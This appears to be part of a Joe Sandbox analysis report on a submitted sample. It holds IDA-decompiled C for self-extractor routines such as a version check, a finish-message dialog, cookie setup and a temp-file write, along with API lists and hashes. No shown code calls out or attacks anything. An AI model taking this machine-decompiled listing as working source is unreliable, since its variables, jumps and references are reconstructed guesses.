                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$advpack.dll
                                                                                                                                                                                                                                                • API String ID: 438848745-3856989675
                                                                                                                                                                                                                                                • Opcode ID: 73e6d5fb6f219a5ba4998a24d9ea374daa50e85b26edadfaa9c0cc9444596b3e
                                                                                                                                                                                                                                                • Instruction ID: 9f91c51db5aa6aae658b93e98363e502b4d983628b79eeef358e2f9cbdae847c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 73e6d5fb6f219a5ba4998a24d9ea374daa50e85b26edadfaa9c0cc9444596b3e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0401A231A001089FD7A4EB66EC4CAEA77F8EB64710F400199B5C597184DE76AA858B50
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E28E8 Relevance: 7.6, APIs: 5, Instructions: 140memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E010E28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
				void* _v8;
				char* _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _v24;
				int _v28;
				int _v32;
				void* _v36;
				int _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				long _t68;
				void* _t70;
				void* _t73;
				void* _t79;
				void* _t83;
				void* _t87;
				void* _t88;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr _t99;
				int _t101;
				void* _t103;
				void* _t106;
				void* _t109;
				void* _t110;

				_v12 = __edx;
				_t99 = __ecx;
				_t106 = 0;
				_v16 = __ecx;
				_t87 = 0;
				_t103 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
					L19:
					_t106 = 1;
				} else {
					_t62 = 0;
					_v8 = 0;
					while(1) {
						_v24 =  *((intOrPtr*)(_t99 + 0x80));
						if(E010E2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
							goto L20;
						}
						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
						_v28 = _t68;
						if(_t68 == 0) {
							_t99 = _v16;
							_t70 = _v8 + _t99;
							_t93 = _v24;
							_t87 = _v20;
							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
								goto L18;
							}
						} else {
							_t103 = GlobalAlloc(0x42, _t68);
							if(_t103 != 0) {
								_t73 = GlobalLock(_t103);
								_v36 = _t73;
								if(_t73 != 0) {
									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
										L15:
										GlobalUnlock(_t103);
										_t99 = _v16;
										L18:
										_t87 = _t87 + 1;
										_t62 = _v8 + 0x3c;
										_v20 = _t87;
										_v8 = _v8 + 0x3c;
										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
											continue;
										} else {
											goto L19;
										}
									} else {
										_t79 = _v44;
										_t88 = _t106;
										_v28 =  *((intOrPtr*)(_t79 + 0xc));
										_t101 = _v28;
										_v48 =  *((intOrPtr*)(_t79 + 8));
										_t83 = _v8 + _v16 + _v24 + 0x94;
										_t97 = _v48;
										_v36 = _t83;
										_t109 = _t83;
										do {
											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E010E2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E010E2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
											_t109 = _t109 + 0x18;
											_t88 = _t88 + 4;
										} while (_t88 < 8);
										_t87 = _v20;
										_t106 = 0;
										if(_v56 < 0 || _v64 > 0) {
											if(_v52 < _t106 || _v60 > _t106) {
												GlobalUnlock(_t103);
											} else {
												goto L15;
											}
										} else {
											goto L15;
										}
									}
								}
							}
						}
						goto L20;
					}
				}
				L20:
				 *_a8 = _t87;
				if(_t103 != 0) {
					GlobalFree(_t103);
				}
				return _t106;
			}

































                                                                                                                                                                                                                                                0x010e28f1
                                                                                                                                                                                                                                                0x010e28f4
                                                                                                                                                                                                                                                0x010e28f7
                                                                                                                                                                                                                                                0x010e28f9
                                                                                                                                                                                                                                                0x010e28fc
                                                                                                                                                                                                                                                0x010e28ff
                                                                                                                                                                                                                                                0x010e2901
                                                                                                                                                                                                                                                0x010e2907
                                                                                                                                                                                                                                                0x010e2a62
                                                                                                                                                                                                                                                0x010e2a64
                                                                                                                                                                                                                                                0x010e290d
                                                                                                                                                                                                                                                0x010e290d
                                                                                                                                                                                                                                                0x010e290f
                                                                                                                                                                                                                                                0x010e2912
                                                                                                                                                                                                                                                0x010e2920
                                                                                                                                                                                                                                                0x010e2937
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2944
                                                                                                                                                                                                                                                0x010e294a
                                                                                                                                                                                                                                                0x010e294f
                                                                                                                                                                                                                                                0x010e2a2f
                                                                                                                                                                                                                                                0x010e2a32
                                                                                                                                                                                                                                                0x010e2a34
                                                                                                                                                                                                                                                0x010e2a37
                                                                                                                                                                                                                                                0x010e2a41
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2955
                                                                                                                                                                                                                                                0x010e295e
                                                                                                                                                                                                                                                0x010e2962
                                                                                                                                                                                                                                                0x010e2969
                                                                                                                                                                                                                                                0x010e296f
                                                                                                                                                                                                                                                0x010e2974
                                                                                                                                                                                                                                                0x010e298c
                                                                                                                                                                                                                                                0x010e2a20
                                                                                                                                                                                                                                                0x010e2a21
                                                                                                                                                                                                                                                0x010e2a27
                                                                                                                                                                                                                                                0x010e2a4c
                                                                                                                                                                                                                                                0x010e2a4f
                                                                                                                                                                                                                                                0x010e2a50
                                                                                                                                                                                                                                                0x010e2a53
                                                                                                                                                                                                                                                0x010e2a56
                                                                                                                                                                                                                                                0x010e2a5c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e29b2
                                                                                                                                                                                                                                                0x010e29b2
                                                                                                                                                                                                                                                0x010e29b5
                                                                                                                                                                                                                                                0x010e29bd
                                                                                                                                                                                                                                                0x010e29c3
                                                                                                                                                                                                                                                0x010e29cc
                                                                                                                                                                                                                                                0x010e29d5
                                                                                                                                                                                                                                                0x010e29d7
                                                                                                                                                                                                                                                0x010e29da
                                                                                                                                                                                                                                                0x010e29dd
                                                                                                                                                                                                                                                0x010e29df
                                                                                                                                                                                                                                                0x010e29ec
                                                                                                                                                                                                                                                0x010e29f8
                                                                                                                                                                                                                                                0x010e29fc
                                                                                                                                                                                                                                                0x010e29ff
                                                                                                                                                                                                                                                0x010e2a02
                                                                                                                                                                                                                                                0x010e2a07
                                                                                                                                                                                                                                                0x010e2a0a
                                                                                                                                                                                                                                                0x010e2a0f
                                                                                                                                                                                                                                                0x010e2a19
                                                                                                                                                                                                                                                0x010e2a81
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2a0f
                                                                                                                                                                                                                                                0x010e298c
                                                                                                                                                                                                                                                0x010e2974
                                                                                                                                                                                                                                                0x010e2962
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e294f
                                                                                                                                                                                                                                                0x010e2912
                                                                                                                                                                                                                                                0x010e2a65
                                                                                                                                                                                                                                                0x010e2a68
                                                                                                                                                                                                                                                0x010e2a6c
                                                                                                                                                                                                                                                0x010e2a6f
                                                                                                                                                                                                                                                0x010e2a6f
                                                                                                                                                                                                                                                0x010e2a7d

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GlobalFree.KERNEL32 ref: 010E2A6F
                                                                                                                                                                                                                                                  • Part of subcall function 010E2773: CharUpperA.USER32(71A8563C,00000000,00000000,00000000), ref: 010E27A8
                                                                                                                                                                                                                                                  • Part of subcall function 010E2773: CharNextA.USER32(0000054D), ref: 010E27B5
                                                                                                                                                                                                                                                  • Part of subcall function 010E2773: CharNextA.USER32(00000000), ref: 010E27BC
                                                                                                                                                                                                                                                  • Part of subcall function 010E2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010E2829
                                                                                                                                                                                                                                                  • Part of subcall function 010E2773: RegQueryValueExA.ADVAPI32(?,010E1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010E2852
                                                                                                                                                                                                                                                  • Part of subcall function 010E2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010E2870
                                                                                                                                                                                                                                                  • Part of subcall function 010E2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010E28A0
                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,010E3938,?,?,?,?,-00000005), ref: 010E2958
                                                                                                                                                                                                                                                • GlobalLock.KERNEL32 ref: 010E2969
                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,010E3938,?,?,?,?,-00000005,?), ref: 010E2A21
                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 010E2A81
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3949799724-0
                                                                                                                                                                                                                                                • Opcode ID: 8d0d4da64087f1a7b386e4707aceab764fa264d8b3ae007d387a700f347d04f0
                                                                                                                                                                                                                                                • Instruction ID: 9e077d0d352446e8b4a0058ce8ea4487db58af8a6c8ba33bf9875b1fce185c9d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d0d4da64087f1a7b386e4707aceab764fa264d8b3ae007d387a700f347d04f0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3513E31E00219DFDB25DF9AC888AAEFBF9FF48700F18416AE995E7211D7359941CB90
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E4169 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 32%
                                                                                                                                                                                                                                                			E010E4169(void* __eflags) {
				int _t18;
				void* _t21;

				_t20 = E010E468F("FINISHMSG", 0, 0);
				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
				if(_t21 != 0) {
					if(E010E468F("FINISHMSG", _t21, _t20) != 0) {
						if(lstrcmpA(_t21, "<None>") == 0) {
							L7:
							return LocalFree(_t21);
						}
						_push(0);
						_push(0x40);
						_push(0);
						_push(_t21);
						_t18 = 0x3e9;
						L6:
						E010E44B9(0, _t18);
						goto L7;
					}
					_push(0);
					_push(0x10);
					_push(0);
					_push(0);
					_t18 = 0x4b1;
					goto L6;
				}
				return E010E44B9(0, 0x4b5, 0, 0, 0x10, 0);
			}





                                                                                                                                                                                                                                                0x010e417d
                                                                                                                                                                                                                                                0x010e418f
                                                                                                                                                                                                                                                0x010e4193
                                                                                                                                                                                                                                                0x010e41b7
                                                                                                                                                                                                                                                0x010e41d3
                                                                                                                                                                                                                                                0x010e41e6
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e41e7
                                                                                                                                                                                                                                                0x010e41d5
                                                                                                                                                                                                                                                0x010e41d6
                                                                                                                                                                                                                                                0x010e41d8
                                                                                                                                                                                                                                                0x010e41d9
                                                                                                                                                                                                                                                0x010e41da
                                                                                                                                                                                                                                                0x010e41df
                                                                                                                                                                                                                                                0x010e41e1
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e41e1
                                                                                                                                                                                                                                                0x010e41b9
                                                                                                                                                                                                                                                0x010e41ba
                                                                                                                                                                                                                                                0x010e41bc
                                                                                                                                                                                                                                                0x010e41bd
                                                                                                                                                                                                                                                0x010e41be
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e41be
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46A0
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: SizeofResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46A9
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46C3
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: LoadResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46CC
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: LockResource.KERNEL32(00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46D3
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: memcpy_s.MSVCRT ref: 010E46E5
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46EF
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,010E30B4), ref: 010E4189
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,010E30B4), ref: 010E41E7
                                                                                                                                                                                                                                                  • Part of subcall function 010E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                                                                                                                                                                                                                                                  • Part of subcall function 010E44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                                • String ID: <None>$FINISHMSG
                                                                                                                                                                                                                                                • API String ID: 3507850446-3091758298
                                                                                                                                                                                                                                                • Opcode ID: 1683d704414b35d4daca7114a543ff4bc830d8642040fbf4e6c0362a113f1687
                                                                                                                                                                                                                                                • Instruction ID: 60e6e793b66560f2ac8dcf9c844decc26569ee38ba34352c021fb904f5b26d76
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1683d704414b35d4daca7114a543ff4bc830d8642040fbf4e6c0362a113f1687
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F01ADB1700215BFF7291A6B8C8DFBB65CEDBD8A95F0040A9B785E61849AB9CC0141B5
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E7155 Relevance: 7.6, APIs: 5, Instructions: 51timethreadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E010E7155() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0x10e8004; // 0x71a8563c
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0x10e8004 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0x10e8004 = _t39;
				}
				_t37 =  !_t36;
				 *0x10e8008 = _t37;
				return _t37;
			}











                                                                                                                                                                                                                                                0x010e715d
                                                                                                                                                                                                                                                0x010e7161
                                                                                                                                                                                                                                                0x010e7165
                                                                                                                                                                                                                                                0x010e7178
                                                                                                                                                                                                                                                0x010e7182
                                                                                                                                                                                                                                                0x010e718e
                                                                                                                                                                                                                                                0x010e7197
                                                                                                                                                                                                                                                0x010e71a0
                                                                                                                                                                                                                                                0x010e71b1
                                                                                                                                                                                                                                                0x010e71b8
                                                                                                                                                                                                                                                0x010e71c4
                                                                                                                                                                                                                                                0x010e71c7
                                                                                                                                                                                                                                                0x010e71cb
                                                                                                                                                                                                                                                0x010e71d5
                                                                                                                                                                                                                                                0x010e71da
                                                                                                                                                                                                                                                0x010e71da
                                                                                                                                                                                                                                                0x010e71dc
                                                                                                                                                                                                                                                0x010e71dc
                                                                                                                                                                                                                                                0x010e71e2
                                                                                                                                                                                                                                                0x010e71e5
                                                                                                                                                                                                                                                0x010e71ee

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 010E7182
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 010E7191
                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 010E719A
                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 010E71A3
                                                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 010E71B8
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1445889803-0
                                                                                                                                                                                                                                                • Opcode ID: 59dfc0629528aaa5e850fa9ab406f4c0ed401beb6ab5f5d5bb49d15789566b91
                                                                                                                                                                                                                                                • Instruction ID: 4b8449008859c847cf3a163ef4e382dfca948fc55b83a7d7be811277e8f9b286
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 59dfc0629528aaa5e850fa9ab406f4c0ed401beb6ab5f5d5bb49d15789566b91
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2111C71E01208DFCB60DFBAD648A9EBBF5EF48755F614896E945EB204E639DA008B40
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E19E0 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E010E19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
				signed int _v8;
				char _v520;
				void* __esi;
				signed int _t11;
				void* _t14;
				void* _t23;
				void* _t27;
				void* _t33;
				struct HWND__* _t34;
				signed int _t35;

				_t33 = __edi;
				_t27 = __ebx;
				_t11 =  *0x10e8004; // 0x71a8563c
				_v8 = _t11 ^ _t35;
				_t34 = _a4;
				_t14 = _a8 - 0x110;
				if(_t14 == 0) {
					_t32 = GetDesktopWindow();
					E010E43D0(_t34, _t15);
					_v520 = 0;
					LoadStringA( *0x10e9a3c, _a16,  &_v520, 0x200);
					SetDlgItemTextA(_t34, 0x83f,  &_v520);
					MessageBeep(0xffffffff);
					goto L6;
				} else {
					if(_t14 != 1) {
						L4:
						_t23 = 0;
					} else {
						_t32 = _a12;
						if(_t32 - 0x83d > 1) {
							goto L4;
						} else {
							EndDialog(_t34, _t32);
							L6:
							_t23 = 1;
						}
					}
				}
				return E010E6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}













                                                                                                                                                                                                                                                0x010e19e0
                                                                                                                                                                                                                                                0x010e19e0
                                                                                                                                                                                                                                                0x010e19eb
                                                                                                                                                                                                                                                0x010e19f2
                                                                                                                                                                                                                                                0x010e19f9
                                                                                                                                                                                                                                                0x010e19fc
                                                                                                                                                                                                                                                0x010e1a01
                                                                                                                                                                                                                                                0x010e1a2a
                                                                                                                                                                                                                                                0x010e1a2e
                                                                                                                                                                                                                                                0x010e1a3e
                                                                                                                                                                                                                                                0x010e1a4f
                                                                                                                                                                                                                                                0x010e1a62
                                                                                                                                                                                                                                                0x010e1a6a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e1a03
                                                                                                                                                                                                                                                0x010e1a06
                                                                                                                                                                                                                                                0x010e1a20
                                                                                                                                                                                                                                                0x010e1a20
                                                                                                                                                                                                                                                0x010e1a08
                                                                                                                                                                                                                                                0x010e1a08
                                                                                                                                                                                                                                                0x010e1a14
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e1a16
                                                                                                                                                                                                                                                0x010e1a18
                                                                                                                                                                                                                                                0x010e1a70
                                                                                                                                                                                                                                                0x010e1a72
                                                                                                                                                                                                                                                0x010e1a72
                                                                                                                                                                                                                                                0x010e1a14
                                                                                                                                                                                                                                                0x010e1a06
                                                                                                                                                                                                                                                0x010e1a81

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • EndDialog.USER32(?,?), ref: 010E1A18
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 010E1A24
                                                                                                                                                                                                                                                • LoadStringA.USER32(?,?,00000200), ref: 010E1A4F
                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 010E1A62
                                                                                                                                                                                                                                                • MessageBeep.USER32(000000FF), ref: 010E1A6A
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1273765764-0
                                                                                                                                                                                                                                                • Opcode ID: 70f6e06b495c1a31498465e69c00be9a295413983141dce4be9a480a7ec1475a
                                                                                                                                                                                                                                                • Instruction ID: 19918536b8c2bbdeadd579b83861d6b53a2ed2d64767a52f395f8c51cc3c88a7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 70f6e06b495c1a31498465e69c00be9a295413983141dce4be9a480a7ec1475a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4411A131600109EFDB20EF69EA0CABE7BF8EF49750F048195E992DB184DA359E11CB95
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E63C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 88%
                                                                                                                                                                                                                                                			E010E63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
				signed int _v8;
				char _v268;
				long _v272;
				void* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				long _t28;
				struct _OVERLAPPED* _t37;
				void* _t39;
				signed int _t40;

				_t15 =  *0x10e8004; // 0x71a8563c
				_v8 = _t15 ^ _t40;
				_v272 = _v272 & 0x00000000;
				_push(__ecx);
				_v276 = _a16;
				_t37 = 1;
				E010E1781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
				E010E658A( &_v268, 0x104, _a12);
				_t28 = 0;
				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t39 != 0xffffffff) {
					_t28 = _a4;
					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
						 *0x10e9124 = 0x80070052;
						_t37 = 0;
					}
					CloseHandle(_t39);
				} else {
					 *0x10e9124 = 0x80070052;
					_t37 = 0;
				}
				return E010E6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
			}















                                                                                                                                                                                                                                                0x010e63cb
                                                                                                                                                                                                                                                0x010e63d2
                                                                                                                                                                                                                                                0x010e63d8
                                                                                                                                                                                                                                                0x010e63ea
                                                                                                                                                                                                                                                0x010e63f3
                                                                                                                                                                                                                                                0x010e6401
                                                                                                                                                                                                                                                0x010e6402
